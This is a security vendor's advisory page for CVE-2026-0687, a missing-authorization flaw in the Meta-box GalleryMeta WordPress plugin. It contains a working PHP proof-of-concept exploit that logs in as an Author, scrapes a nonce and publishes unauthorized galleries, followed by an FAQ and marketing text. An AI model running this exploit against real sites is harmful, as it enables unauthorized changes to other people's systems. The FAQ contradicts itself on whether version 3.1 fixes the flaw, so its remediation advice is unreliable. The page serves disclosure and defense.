// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0687 - Meta-box GalleryMeta <= 3.0.1 - Missing Authorization to Authenticated (Author+) Gallery Management

<?php
/**
 * Proof of Concept for CVE-2026-0687
 * Requires valid WordPress authentication cookies for a user with Author role or higher
 */

$target_url = 'https://vulnerable-wordpress-site.com';
$username = 'attacker_author';
$password = 'password123';

// Step 1: Authenticate to obtain session cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Create new gallery post
$new_gallery_url = $target_url . '/wp-admin/post-new.php?post_type=mb_gallery';
curl_setopt($ch, CURLOPT_URL, $new_gallery_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce from the form (required for WordPress submission)
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $nonce_matches);
$wp_nonce = $nonce_matches[1] ?? '';

// Step 3: Submit gallery with unauthorized image IDs
$submit_url = $target_url . '/wp-admin/post.php';
$gallery_data = array(
    'post_type' => 'mb_gallery',
    'post_title' => 'Unauthorized Gallery - Atomic Edge PoC',
    'post_status' => 'publish',
    '_wpnonce' => $wp_nonce,
    '_wp_http_referer' => '/wp-admin/post-new.php?post_type=mb_gallery',
    'mbgm_gallery_id' => array(
        '0' => '123',  // Arbitrary attachment ID
        '1' => '456'   // Another arbitrary attachment ID
    ),
    'action' => 'editpost',
    'post_ID' => '0'  // New post
);

curl_setopt($ch, CURLOPT_URL, $submit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($gallery_data));
$response = curl_exec($ch);

// Verify success by checking for gallery ID in response
if (strpos($response, 'mbgm_gallery_id') !== false) {
    echo "SUCCESS: Unauthorized gallery created.n";
    // Extract the new post ID from redirect
    preg_match('/post=([0-9]+)&action=edit/', $response, $post_id_matches);
    if (!empty($post_id_matches[1])) {
        echo "Gallery ID: " . $post_id_matches[1] . "n";
    }
} else {
    echo "FAILED: Gallery creation unsuccessful.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-0687?
Overview of the vulnerability
CVE-2026-0687 is a medium severity vulnerability in the Meta-box GalleryMeta plugin for WordPress, which allows authenticated users with Author-level access and above to create and publish galleries without proper authorization checks.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from a missing capability check in the registration of the ‘mb_gallery’ custom post type. Authenticated users can send a request to create galleries without verifying if they have the necessary permissions, which allows unauthorized gallery management.
Who is affected by CVE-2026-0687?
Identifying impacted users
Any WordPress site using the Meta-box GalleryMeta plugin version 3.0.1 or earlier is affected. This includes sites where users have Author-level access or higher, as they can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the Meta-box GalleryMeta plugin installed. If it is version 3.0.1 or earlier, your site is at risk and should be updated.
What is the CVSS score and what does it mean?
Understanding the severity rating
The CVSS score for CVE-2026-0687 is 4.3, which indicates a medium severity level. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized content creation.
How can I fix or mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Meta-box GalleryMeta plugin to version 3.1 or later. Regularly check for updates and apply them promptly to ensure security.
What should I do if I cannot update the plugin immediately?
Temporary measures
If immediate updating is not possible, consider disabling the plugin until a secure version is available. Additionally, review user roles and permissions to limit access to Author-level users.
What does the proof of concept demonstrate?
Understanding exploitation
The proof of concept illustrates how an authenticated attacker can exploit the vulnerability by sending a crafted request to create a gallery without proper authorization. It highlights the ease of exploitation given the lack of capability checks.
What are the potential risks of exploitation?
Consequences of the vulnerability
Successful exploitation could allow attackers to create and publish unauthorized galleries, potentially containing malicious content. This undermines the site’s content management and could lead to further security risks.
Is the vulnerability patched in version 3.1?
Patch status
While version 3.1 of the plugin has been released, it does not address the core authorization flaw. It is essential to monitor for future updates that provide a complete fix.
How can I secure my WordPress site against similar vulnerabilities?
Best practices for security
To secure your WordPress site, regularly update all plugins and themes, implement strong user role management, and conduct security audits. Consider using security plugins that monitor for vulnerabilities.
Where can I find more information about CVE-2026-0687?
Additional resources
More information about CVE-2026-0687 can be found on the National Vulnerability Database or through security advisories related to the Meta-box GalleryMeta plugin.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations